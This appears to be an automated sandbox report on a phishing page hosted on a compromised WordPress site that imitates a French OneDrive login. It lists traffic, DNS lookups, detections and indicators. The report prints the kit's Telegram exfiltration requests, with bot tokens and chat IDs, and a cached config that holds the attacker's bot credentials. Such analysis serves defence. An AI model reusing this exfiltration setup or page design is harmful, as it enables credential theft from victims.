Source: global trafficHTTP traffic detected: GET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.askozvar.sk
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: dancinggorillas.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 22:35:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.askozvar.sk/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: chromecache_86.2.dr, chromecache_79.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_72.2.dr, chromecache_74.2.drString found in binary or memory: http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf
Source: chromecache_75.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_77.2.drString found in binary or memory: https://api.telegram.org/bot
Source: chromecache_75.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: chromecache_75.2.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: chromecache_75.2.drString found in binary or memory: https://dancinggorillas.com/style/pdf_fr.js
Source: chromecache_70.2.drString found in binary or memory: https://drive.google.com/file/d/1eNHvaGM65gZPNQetBmCc0X9V14ygIJ9J/view
Source: chromecache_75.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4gaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4iaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4jaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4vaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5OaVI
Source: chromecache_66.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5caVI
Source: chromecache_84.2.dr, chromecache_82.2.dr, chromecache_65.2.drString found in binary or memory: https://getbootstrap.com)
Source: chromecache_71.2.dr, chromecache_76.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_65.2.dr, chromecache_76.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_76.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_75.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: chromecache_75.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: chromecache_75.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: classification engineClassification label: mal80.phis.troj.win@16/41@30/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html100%Avira URL Cloudphishing
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://code.jquery.com/jquery-3.2.1.slim.min.js0%URL Reputationsafe
https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js0%URL Reputationsafe
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js0%URL Reputationsafe
http://opensource.org/licenses/MIT).0%URL Reputationsafe
https://getbootstrap.com/)0%URL Reputationsafe
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css0%URL Reputationsafe
https://api.telegram.org/bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png100%Avira URL Cloudphishing
https://api.telegram.org/bot0%Avira URL Cloudsafe
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js100%Avira URL Cloudphishing
https://getbootstrap.com)0%Avira URL Cloudsafe
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js100%Avira URL Cloudphishing
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
https://dancinggorillas.com/style/10.js0%Avira URL Cloudsafe
https://api.telegram.org/bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.php0%Avira URL Cloudsafe
https://drive.google.com/file/d/1eNHvaGM65gZPNQetBmCc0X9V14ygIJ9J/view0%Avira URL Cloudsafe
https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png100%Avira URL Cloudphishing
https://dancinggorillas.com/style/pdf_fr.js0%Avira URL Cloudsafe
https://api.telegram.org/bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html0%Avira URL Cloudsafe
http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf100%Avira URL Cloudphishing
https://www.askozvar.sk/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
www.askozvar.sk
88.212.10.20
truetrue
    unknown
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      unknown
      dancinggorillas.com
      34.87.236.72
      truefalse
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          unknown
          edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          84.201.210.35
          truefalse
            unknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              unknown
              maxcdn.bootstrapcdn.com
              104.18.10.207
              truefalse
                unknown
                www.google.com
                142.250.186.68
                truefalse
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.htmlfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.jstrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                      • URL Reputation: safe
                      unknown
                      https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmltrue
                        unknown
                        https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.jsfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://dancinggorillas.com/style/10.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.pngfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                        • URL Reputation: safe
                        unknown
                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.phpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.htmlfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.pngfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://dancinggorillas.com/style/pdf_fr.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.askozvar.sk/favicon.icofalse
                        • Avira URL Cloud: phishing
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_76.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/botchromecache_77.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://getbootstrap.com)chromecache_84.2.dr, chromecache_82.2.dr, chromecache_65.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_65.2.dr, chromecache_76.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://opensource.org/licenses/MIT).chromecache_86.2.dr, chromecache_79.2.drfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.google.com/file/d/1eNHvaGM65gZPNQetBmCc0X9V14ygIJ9J/viewchromecache_70.2.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://getbootstrap.com/)chromecache_71.2.dr, chromecache_76.2.drfalse
                        • URL Reputation: safe
                        unknown
                        http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdfchromecache_72.2.dr, chromecache_74.2.drfalse
                        • Avira URL Cloud: phishing
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.186.68
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        104.18.10.207
                        maxcdn.bootstrapcdn.comUnited States
                        13335CLOUDFLARENETUSfalse
                        88.212.10.20
                        www.askozvar.skSlovakia (SLOVAK Republic)
                        42841ANTIKSKtrue
                        34.87.236.72
                        dancinggorillas.comUnited States
                        15169GOOGLEUSfalse
                        151.101.130.137
                        code.jquery.comUnited States
                        54113FASTLYUSfalse
                        104.18.11.207
                        stackpath.bootstrapcdn.comUnited States
                        13335CLOUDFLARENETUSfalse
                        149.154.167.220
                        api.telegram.orgUnited Kingdom
                        62041TELEGRAMRUtrue
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        151.101.194.137
                        unknownUnited States
                        54113FASTLYUSfalse
                        104.17.25.14
                        cdnjs.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        IP
                        192.168.2.7
                        192.168.2.4
                        192.168.2.6
                        192.168.2.5
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1502053
                        Start date and time:2024-08-31 00:34:40 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 29s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:browseurl.jbs
                        Sample URL:https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal80.phis.troj.win@16/41@30/14
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.186.142, 64.233.184.84, 34.104.35.123, 142.250.184.202, 142.250.186.74, 142.250.185.67, 216.58.206.74, 142.250.185.106, 142.250.185.138, 142.250.186.106, 142.250.185.202, 142.250.185.170, 142.250.184.234, 142.250.181.234, 142.250.186.42, 172.217.16.138, 216.58.212.170, 142.250.185.74, 142.250.186.170, 172.217.18.106, 216.58.212.138, 142.250.185.234, 40.127.169.103, 84.201.210.35, 20.242.39.171, 192.229.221.95, 20.3.187.198, 142.250.184.195
                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        No simulations
                        InputOutput
                        URL: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html Model: jbxai
                        {
                        "brand":["OneDrive",
                        "Microsoft"],
                        "contains_trigger_text":true,
                        "prominent_button_name":"Continuer",
                        "text_input_field_labels":["Entrez l'adresse email"],
                        "pdf_icon_visible":false,
                        "has_visible_captcha":false,
                        "has_urgent_text":false,
                        "has_visible_qrcode":false}
                        URL: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html Model: jbxai
                        {
                        "phishing_score":8,
                        "brand_name":"OneDrive",
                        "reasons":"The domain 'www.askozvar.sk' does not match the legitimate domain associated with OneDrive,
                         which is 'onedrive.live.com'. Additionally,
                         the URL has a Slovakian domain extension (.sk),
                         which is not commonly used by Microsoft-owned services. The design of the webpage is clean and minimalistic,
                         but this could be a attempt to mimic the legitimate OneDrive website."}
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):120
                        Entropy (8bit):5.35673126782461
                        Encrypted:false
                        SSDEEP:3:qU2KLyFPqFuRYMe6mEM4u8ESCJovf44RSr:qU21qUBI4zExJk44w
                        MD5:308349266B4A9DC26412208E7DB4108D
                        SHA1:D5F9C7F1CCE93C982A554A2794BE8D5097044FDB
                        SHA-256:AEF03032E02117F21716BC6227093228B58DE1FD4B0007C3987C5EEFC7AEDEB5
                        SHA-512:1D66B42D038A6861257E6F7E67E69302F35505178837D5E950C203D2CAAF65E0CFAB3D83CC0C2A26AC05C7D52FBFFE8BCB44C21C80449FD946E674FD8D037C34
                        Malicious:false
                        Reputation:low
                        Preview:var telegramConfig = {.. botToken: '7476294701:AAHp0Imisc_Yg7QfBWPayX6IkiUtBYyzntQ',.. chatID: '-4279547544'..};..
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
